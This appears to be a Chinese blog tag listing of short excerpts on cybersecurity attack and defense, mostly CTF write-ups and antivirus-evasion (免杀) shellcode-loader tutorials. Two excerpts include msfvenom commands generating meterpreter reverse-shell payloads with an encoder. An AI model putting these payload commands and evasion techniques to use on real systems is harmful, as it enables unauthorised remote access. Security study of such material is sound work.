免杀攻防

攻防世界pwn新手区题解-level3

攻防世界pwn-level3详细题解目录准备工作执行ELF文件IDA查看ELF文件查找可利用指令开始写expEXP准备工作将附件下载下来后解压得两个文件level3和libc_32.so.6分别查看文件类型
川川小宝·2023-09-30 07:12

【红队攻防】从零开始的木马免杀到上线

0、环境配置说明应该全部使用云服务器完整演示比较好,奈何太穷了买不起服务器,只能用本地环境演示。所需环境如下:系统环境:CentOS7,Windows10软件环境CobaltStrike4.7,ShellQMaker,360杀毒一、CobaltStrike环境配置CentOS7.8环境安装CobaltStrike必备工具安装yum-yinstalllrzsz,unzip上传文件解压然后切换至Cob
为赋新词强说愁·2023-09-30 03:35

免杀对抗-Nim语言免杀-加载工具+加载方式

Nim语言-加载工具-NimShellCodeLoader项目配置环境:1.下载Nim语言&配置bin目录环境变量链接:https://nim-lang.org/install_windows.html配置环境变量2.下载mingw链接:https://nim-lang.org/download/mingw64.7z配置bin目录环境变量3.下载git,配置bin目录环境变量链接:https://
xiaoheizi安全·2023-09-29 23:40

【安全研究】Linux后渗透常见后门驻留方式分析

又或者,在RedTeam拿下一台服务器,为达到长久控制的目的而专门定制持久化后门(免杀肯定是必须的)的前提下,他们会如何结合系统自身的某些特性,达到持久化控制的效果?
安全狗(safedog)·2023-09-29 07:55

聚焦云原生安全攻防|构建纵深防御的运行时威胁检测体系

7月2日,诸子云北京分会研讨会活动—网络安全攻防对抗在北京成功举办。作为国内云原生安全领导厂商,安全狗也参与此次活动。
安全狗(safedog)·2023-09-29 07:55

近期大型攻防演练观感及未来攻防趋势判断

先说结论今年大型攻防演练的观感:大量的国产商业软件供应链厂商的大量商业软件0day被用来攻击(以安全产品、OA、cms、办公软件为主)社工+钓鱼又玩出了新花样(红队这帮人估计去电诈团队培训回来的?)
墨菲安全·2023-09-29 05:57

学网络安全以后可以做什么?6个就业方向一定要提前知道

前言学会网络攻防技术之后可以找哪些工作?这篇文章给你答案,尤其是最后一个职业,月薪起码是3万以上。
万天峰·2023-09-29 00:18

2023网络安全HW蓝队面试题汇总

护网行动是提高国家网络安全防御能力的一种有效手段,而蓝队作为攻防演习中的防守方,也是护网行动的重要一份子。
知白守黑V·2023-09-28 18:36

网络安全攻防:软件逆向之反汇编

网络安全是当今社会中一个非常重要的问题,而软件逆向工程是网络安全攻防中常用的一种技术手段。在软件逆向工程中,反汇编是一种基础而重要的技术。
SafePloy安策·2023-09-28 06:37

攻防世界题目练习——Reverse新手+引导模式

题目目录1.6662.Reversing-x64Elf-1003.easyRE14.insanity5.open-source6.game7.Hello,CTF8.re11.666下载附件用IDAPro打开文件,直接看到main入口,反编译查看代码如下:注:strcmp(a,b)函数当a=b时返回值为0。int__cdeclmain(intargc,constchar**argv,constcha
什么都没学会·2023-09-27 12:28

【IR】什么是对抗攻击 | 视觉跟踪

现在有机会接触一下针对深度学习神经网络的对抗攻击,并做整理如下对于CV攻防,其实去年12月组会听完就浏览过相关文章面向目标检测的对抗样本综述+后门防御,NIPS2022adversarialattackfortrackingCVPR2021
ca1m4n·2023-09-27 11:11

免杀对抗-无文件落地&分离拆分-文本提取+加载器分离+参数协议化+图片隐写

无文件落地&分离拆分无文件落地&分离拆分其实就是内存免杀,内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。
xiaoheizi安全·2023-09-27 10:52

免杀对抗-内存加载-shellcode转换-UUID+MAC+IPV4

内存加载-UUID地址-ShellCode转换介绍:通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。演示语言:c++1.使用以下代码将c语言的shellcode转换为uuid类型代码:uuid.pyimportuuidimportbinasciibuf=b"生成的shellcode"hex=bina
xiaoheizi安全·2023-09-27 10:16

黑色幽默喜剧电影的“巅峰”

(电影海报)《疯狂的石头》是讲述由一块价值连城的翡翠被发现,从而牵涉出各方势力为争夺翡翠展开的一场斗智斗勇的“翡翠攻防战”《疯狂的石头》是由宁浩编剧与执导出的主打黑色幽默喜剧的电影,电影由郭涛、刘桦、连晋
电影ONE·2023-09-27 05:20

如何做安全测试?

多做灵感性记录这是平时学习总结的地方,用做知识库平时看到其他文章的相关知识,也会增加到这里随着学习深入,会进行知识拆分和汇总,所以文章会随时更新参考的文章过多,所以参考会写不全,见谅进行安全测试的,是需要专业的攻防技术的
甜老太儿·2023-09-27 01:37

人工智能在网络攻防领域的应用及问题分析

如今互联网已经深入人们的生活,网络安全问题也日益严峻,黑客攻击、数据泄露等事件频频发生,企业和个人都面临的巨大的安全威胁。在计算机网络技术迅速发展和人类社会不断进步的带动下,人工智能也与时俱进,并得到迅速传播和发展,进而直接或间接地推动着其他学科领域的进步和发展。网络安全问题也在日渐成为人们的关注焦点,如何才能有效的利用人工智能技术对网络数据进行安全防护呢?算法、数据与算力是人工智能发展的三大核心
网络安全学习库·2023-09-26 21:42

免杀技术,你需要学习哪些内容

免杀技术,你需要学习哪些内容?什么是免杀免杀是指通过各种技术手段使恶意软件或病毒能够逃避杀毒软件的检测和阻止,成功地感染目标系统。
自饰者六便士·2023-09-26 17:21

业务逻辑漏洞总结

本篇文章是根据《web攻防业务安全实战指南》一书的知识进行简要的总结而成的笔记。归类逻辑漏洞主要产生的位置登录处业务办理处验证码处支付处密码找回处登录处存在的逻辑漏洞可以暴力破解用户名或密码没有验
爱笑的三月姑娘·2023-09-26 10:14

Shopee安全团队(新加坡)安全运营/漏洞研究岗位开放招聘

这个月我们新增加了几个与安全运营、漏洞攻防相关的岗位,面向全球安全从业者开放申请。
落沐萧萧·2023-09-26 09:04

不安全的反序列化

序列化实例1.2.1定义一个类1.2.2创建对象1.2.3反序列化1.2.4对象注入二、漏洞何在2.1漏洞触发2.1.1有一个类2.1.2有一个对象2.1.3反序列化执行代码2.2为什么会这样三、反序列化漏洞攻防
g_h_i·2023-09-26 06:08

从云服务器 SSRF 漏洞到接管你的阿里云控制台

0x00前言本文将以阿里云为例,对云服务中的一些攻防手法进行演示,首先利用Terraform进行ECSSSRF漏洞环境的搭建,然后通过实例中存在的SSRF漏洞一步步拿下该云服务账户的所有的阿里云服务权限
火线安全·2023-09-26 05:15

近年HVV、红队攻防比赛中常见外围打点漏洞的分析与总结

原文来自于:第72篇:近年HVV、红队攻防比赛中常见外围打点漏洞的分析与总结前一段时间我花时间花精力总结了最近两三年中,在攻防比赛中比较常见的Web打点漏洞类型,捎带着把钓鱼邮件的主题类型也总结了一下。
安全大哥·2023-09-26 05:44

攻防演练:渗透测试云上初体验

我的博客园地址前言免责声明:涉及到的所有技术仅用来学习交流,严禁用于非法用途,未经授权请勿非法渗透。否则产生的一切后果自行承担!该渗透测试项目为已授权项目,本文已对敏感部分做了相关处理。渗透测试本质还是在于信息收集,信息收集的越多,攻击面就越广,成功拿下主机的几率就越大。本文记一次对授权目标进行渗透时信息收集到目标站点下的一个子域名中存在信息泄露,从泄露的内容入手拿下云主机,实现云主机的接管,从而
JulySec·2023-09-26 05:42

云安全【阿里云ECS攻防

关于VPC的概念还请看:记录一下弹性计算云服务的一些词汇概念-火线Zone-安全攻防社区一、初始化访问1、元数据1.1、SSRF导致读取元数据如果管理员给ECS配置了RAM角色,那么就可以获得临时凭证如果配置
安全大哥·2023-09-26 05:39

快船0:2落后,泰伦卢:我没错。小卡:还让我怎么发力?

雄鹿现在的三巨头攻防两端都很有侵略性,能打败雄鹿的或许只有篮网。今天快船VS独行侠这一场比赛是很多人没有想到的,快船在主场0:2落后,第三场回到独行侠的主场,快船还能打得更好吗?今天莱昂纳德已经尽
投篮技术剖析·2023-09-25 21:40

ATT&CK红队评估实战靶场二

本次红队环境主要AccessToken利用、WMI利用、域漏洞利用SMBrelay,EWSrelay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/SidHistory/MOF等攻防技术
- Time·2023-09-25 19:43

【渗透攻防】千变万化的WebShell

前言WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。本篇文章将带大家学习如何获取WebShell,如何隐藏WebShell,有攻必有防,最后带大家学习查杀WebShell。目录第一节CMS获取WebShell第二节非CMS获取WebShell第三节基于xslt转换的WebShell第四节代码混淆隐藏WebShell第五节防御
hacker鬼七·2023-09-25 17:21

认识JSP webshell免杀

【virustotal】【D盾】【shellpub】接下来进行免杀免杀就是将这些被识别的特征进行替换,绕过,混淆和干扰。
凌木LSJ·2023-09-25 15:32

护网有为 | 2021网络攻防演习之感谢信

近日,易安联因积极协助和支撑中国核工业华兴建设有限公司、中国核工业第二二建设有限公司的护网专项行动,有效保障了两家公司护网行动期间网络的安全稳定运行,因而获得了中核华兴与中核二二的高度认可,并向我司致书面感谢信,这是对易安联安全服务能力的肯定。▲来自中核二二▲来自中核华兴作为行业内领先的零信任解决方案提供商,易安联最早开始研究零信任技术并率先推出基于零信任架构下的系列网络安全产品和全套解决方案。目
零信任Enlink_Young·2023-09-25 15:20

最新《2023上半年网络安全观察报告》发布,解读网络安全发展

回顾2023上半年,人工智能大模型飞速应用于网络攻击与对抗,颠覆传统攻防场景,新型安全威胁凸显;国产化系统漏洞被大规模利用,严重威胁国内用户数据安全与财产安全;个人信息泄露问题频频出现,数据泄露到底流向何处
CSDN云计算·2023-09-25 15:10

白帽子黑客与网络安全工程师教你:信息扫描集成工具Sparta使用技巧

2、搜索:Kali与编程,学习更多网络攻防干货!3、Kali与编程每天准时更新,敬请学习和关注!
Kali与编程~·2023-09-25 12:47

ASP攻防环境搭建

1.添加——新建——网站——添写网站名——填写ip地址,端口唯一(不可重复)——选择路径(C——www——发布文件或网站文件(ASP或者html))2.访问时弹出登录验证,这是部署时未给网站设定读写权限。3.设置读写权限后可访问网站地址(设置了默认首页index.aspx,以及启用了父路径)
世界之_窗·2023-09-25 11:42

阿里云ACA课程之云上安全防护

阿里云ACA课程之云上安全防护互联网常见形式及安全威胁安全形势常见威胁阿里云安全体系阿里云云安全体系十年攻防,一朝成盾云盾的基础DDOS防护安全相关的概念DDoS攻击是什么基础DDos防护的实现流程基础
不懂i·2023-09-25 11:13

WAF Bypass及案例实战

1.2.1WAF指纹识别工具1.3绕WAF的多种方式2.SQLiBypass2.1Bypass思路2.1.1层面问题2.1.2HTTP问题2.2绕过分析2.2.1绕过方式2.2.2脚本编写3.一句话木马免杀
来日可期x·2023-09-25 03:20

攻防世界-misc进阶 Recover-Deleted-File

攻防世界-misc进阶Recover-Deleted-File攻防世界全misc进阶(Github)工具scalpel扫描整个镜像文件,根据配置文件寻找相关文件类型的文件头和文件尾,正常找到后将这段内容雕刻出来
vientof·2023-09-25 01:01

攻防世界-misc进阶 funny_video

攻防世界-misc进阶funny_video攻防世界全misc进阶(Github)直接观看视频发现有两个音频,用MKVToolnixPortable提取出两个音频用audacity查看其中一个音频的频谱图
vientof·2023-09-25 01:01

攻防世界-misc进阶 labour

攻防世界-misc进阶labour攻防世界全misc进阶(Github)winhex查看文件数据,发现是gpx数据,到相应网址解析http://www.visugpx.com/index.phphttp
vientof·2023-09-25 01:01

免杀对抗-java语言-shellcode免杀-源码修改+打包exe

JAVA-ShellCode免杀-源码修改&打包EXEShellcode-生成/上线1.msf生成shellcode命令:msfvenom-pjava/meterpreter/reverse_tcpLHOST
xiaoheizi安全·2023-09-24 15:34

免杀对抗-PowerShell-混淆+分离

演示:PowerShell-生成和上线1.生成——启动cs,生成两种模式的powershell脚本文件模式:执行ps1文件上线命令模式:执行txt文件中的命令上线2.文件模式powershell执行——两种方法方法一:打开Win7以上自带的WindowsPowerShellISE来执行成功上线:方法二:打开命令行,启动PowerShell来执行命令:powershell命令:.\payload.p
xiaoheizi安全·2023-09-24 15:04

免杀对抗-C#+go语言-混淆+防反编译+分离

C#&NET-ShellCode-生成/上线一、生成:1.msf生成C#语言的shellcode命令:msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.206.192LPORT=4444-ex86/shikata_ga_nai-i15-fcsharp二、上线:1.c#语言shellcode加载代码:usingSystem;usin
xiaoheizi安全·2023-09-24 15:03

最新报错注入攻击和代码分析技术

点击星标,即时接收最新推文本文选自《web安全攻防渗透测试实战指南(第2版)》点击图片五折购书报错注入攻击报错注入攻击的测试地址在本书第2章。先访问error.php?
Ms08067安全实验室·2023-09-24 12:27

最新时间注入攻击和代码分析技术

点击星标,即时接收最新推文本文选自《web安全攻防渗透测试实战指南(第2版)》点击图片五折购书时间注入攻击时间注入攻击的测试地址在本书第2章。
Ms08067安全实验室·2023-09-24 12:26

攻防世界做题

xff_referer进来之后显示ip地址必须为123.123.123.123抓包看一下要求ip是123.123.123.123就可以用xff伪造即X-Forwarded-For:123.123.123.123得到显示:说必须来自google,伪造refererReferer:https://www.google.com我的要在右边的inspector中加才可以得到flaghttp请求头中Refe
呕...·2023-09-24 07:39

CS 4.7 Stager 逆向及 Shellcode 重写

1.概述一直很想有一个自己的控,奈何实力不允许,CS仍然是目前市面上最好用的控,但是也被各大厂商盯得很紧,通过加载器的方式进行免杀效果有限,后来看到有人用go重写了CS的beacon,感觉这个思路很好,
小袁同学爱学习·2023-09-24 07:02

在校自研内存马查杀工具,非常实用

工具介绍随着攻防演练的愈演愈烈,对抗的技术也在不断提升,在攻防演练中攻击者常常为了不留痕迹以及进行权限维持会注入内存马,在内存马中又以tomcat类型和spring类型较多。
小袁同学爱学习·2023-09-24 07:32

K8S云原生渗透实战

云上攻防就是研究k8s漏洞。此次实战渗透某k8s云原生产品,分享经验心得。普通用户test1通过信息收集、暴力破解等手段
小袁同学爱学习·2023-09-24 07:58

Rust免杀 Shellcode加载与混淆2

前言这是半年前我学习Rust和免杀时的一些记录,最近打开知识库看到了这篇半年前的笔记,并且发现我常逛的安全社区都比较少有人分享Rust以及Rust免杀的帖子,于是想着将这篇笔记分享出来供大家参考和指正。
小袁同学爱学习·2023-09-24 06:23

【web攻防】CVE-2020-10487 tomcat 文件包含漏洞 docker 复现学习

目录前置知识:具体原因:docker复现:POC防御方法前置知识:ajp13是一个二进制的TCP传输协议,相比HTTP这种纯文本的协议来说,效率和性能更高,也做了很多优化,但是,浏览器并不能直接支持AJP13协议,只支持HTTP协议,通过Apache的proxy_ajp模块进行反向代理,暴露成http协议给客户端访问。说人话呢,就是在这个ajp服务的8009端口,存在文件包含的缺陷,可以构造恶意请
AAAAAAAAAAAA66·2023-09-23 21:35

CTF--攻防世界杂项--第二课

下载题目根据文件类型可知,这是一个流量包那么接下来就是利用分析流量包常用的工具wireshark来分析利用关键词进行搜索httpcontainsshell在最后一条数据中看到了flag。以上就结束,非常简单的一道题。
丞星星祺气球·2023-09-23 17:55

CTF--攻防世界--杂项基础

多做几道基础题就会发现这东西真的跟智障题一样,开始嘲笑当初的自己了。就当是学习笔记了【根据题库给的顺序,随便写几道】用那个隐写工具一步完事这一题我是真的理解了杂项的概念,这玩意是真杂啊,死活都没想到居然还有这种题。下一个下载题目后,想着图片隐写这些,结果最后就是直接记事本打开,作者诚不欺我,这是最简单的隐写。下一道下载下来题目一堆我不认识的,了解了才知道这种只有<>-+.类似这种符号的,是brai
丞星星祺气球·2023-09-23 17:55
上一页 21 22 23 24 25 26 27 28 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他